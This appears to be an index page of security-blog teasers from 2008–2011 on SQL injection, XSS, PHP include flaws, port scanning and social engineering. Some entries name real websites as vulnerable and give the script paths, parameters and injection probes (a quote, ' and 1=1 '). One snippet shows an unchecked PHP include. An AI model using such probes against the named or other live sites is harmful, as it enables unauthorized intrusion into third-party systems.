Found: 16
SQL Injection and PHP
In my opinion the most commonly used database attack is SQL Injection. The attack is used by inserting a SQL query into a parameter using the URL field, to be executed by the database server. Being able to execute SQL commands on the database server makes it possible to get control under the server. The following material requires basic knowledge of the SQL-92 language, because this is the main language for accessing data.
SQL injection represents one of the greatest threats for the following reasons:
- Developers are so lazy. They do not test their applications on errors. Divelopers hopes to skills but everybody be able to mistakes.
- Many websites are exposed to SQL injection attacks but don't know it.
- Databases often house significant persanal data such as credit card numbers.
- Any website has a database on the back end and use SQL query to access to the data.
Date: 2008-02-03
[Read the full version]
[Security]
Cross Site Scripting (XSS)
Cross Site Scripting (XSS) is one of the most common application (WEB Browser) layer hacking techniques. XSS is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is. From the trusted context, an attack can be launched. Hackers could steal users data, passwords and any other information. Note that although cross site scripting is also sometimes abbreviated "CSS", it has nothing to do with the Cascading Style Sheets technology that is more commonly called CSS.
Attackers try to inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user in order to gather data from them. Everything from account hijacking, cookie theft/poisoning, changing of user settings, or false advertising is possible. New malicious uses are being found every day for XSS attacks. Cross Site Scripting may be not critical but may be quite critical when vulnerable WEB site stores valuable information in the Cookies files.
Date: 2008-01-23
[Read the full version]
[Security]
SQL Ingection on www.newspaperads.com
Today we shall consider popular mistake SQL Injection by the example of a site www.newspaperads.com. It has interested me for the following reasons:
- Large;
- This site belong well-known USA Today;
- The site uses technology ASP+MS SQL Server.
Date: 2008-01-15
[Read the full version]
[Security]
PHP Include error
Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.
Take the following example:
if(isset($param))
{
include($param);
}
Date: 2008-02-25
[Read the full version]
[Security]
SQL Injection on www.compostingcouncil.org
Today we shall consider a WEB site that contains SQL Injection Error: http://www.compostingcouncil.org. The programmer of the site does not know about security and the majority of the WEB page parameters are vulnerable. We shall consider following URL:
http://www.compostingcouncil.org/section.cfm
The section.cfm file receives the parameter id. If you add in the end of the parameter the single quotes there will be an execution error. We shall consider the error text more in detail:
Date: 2008-03-05
[Read the full version]
[Security]
Critical SQL Injection (http://cshe.berkeley.edu/)
Today we shall consider the SQL Injection error on the site http://cshe.berkeley.edu/. There is a mistake in parameter s the script http://cshe.berkeley.edu/publications/publications.php. If you add to parameter " and 1=1 " the script injects it in SQL query. It means, the mistake exists and we can use it.
Let's try to get amount of fields which are returned with the query. At me it has turned out four fields. The following inquiry was executed correctly.
Date: 2008-03-17
[Read the full version]
[Security]
All our security problems will go away
Today I read one article and I was touched be next phrase:
"Let's just train everyone, and all our security problems will go away." If only it were so easy.
Training and education can't beat all security problems, but proper education can beat fool security problems. Most of errors got appeared in code when developers write code without attentiveness or deep knowledge. Education can beat most of errors. Our software will be more secure and reliable. But education and training can't beat all security problems.
Date: 2008-06-11
[Read the full version]
[Security]
Port Scanner and CyD Network Utilities Security
CyD Software Labs published a new document that describe how to use Port scanner module in the CyD Network Utilities Security tools software product.
Port Scanner is an advanced network utility for finding ports that are open on any machine or range of machines on a network. CyD Port Scanner can scan any class A, B or C network for any list of open ports. Finding open ports on a host can be one of many things. An open port can be a server service like FTP or HTTP that a user on the node may or may not be allowed to run under the network's administration rules.
Date: 2008-12-11
[Read the full version]
[Security]
Social Engineering
Social engineering is a hacker's most powerful weapon. It was used to pull off the most sensational break-ins and to spread the most notorious viruses. Recall the Anna Kurnikova virus, which spread when users received a letter in their mailbox with an attachment purporting to be a picture of Anna in the Eve's fancy dress. This application of social engineering was taking advantage of human weakness. I believe that the excessive curiosity of the male share, which is the larger one, of the Internet users who opened the attachment and infected their computers helped the virus spread.
Hackers are exceptionally good at finding weak spots in people and pressing them to acquire the necessary information. One area, in which social engineering is used, is in obtaining credit card numbers and other information with the help of believable email messages. Users receive a letter asking them for the account password because, for example, the bank's database malfunctioned. What do you think, although they had been explicitly warned by the bank's personnel to never reveal a password to anyone, quite a few users do?
Date: 2009-01-09
[Read the full version]
[Security]
Computer Viruses in email attachments
It is a very good idea never to trust e-mail messages you receive. Never, open e-mail attachments if you are not 100% sure it is safe! Even if your friend's address is in the From field, there is no guarantee that the message is actually from your friend. Even if it is, this does not mean that it is safe to open the attachment: Your friend's computer may be infected by a virus that sends messages bearing his or her name to everyone in the address book, meaning that you might become a victim.
Virus writers understand their social engineering very well and go to great lengths to make their messages intriguing enough to get you to open the attachment. I often receive messages with attachments that are seemingly from my friends or partners, with subjects like "Urgently check this proposal!", but I never do this until I make sure it is safe.
Date: 2011-10-29
[Read the full version]
[Security]
NEXT 10 >>>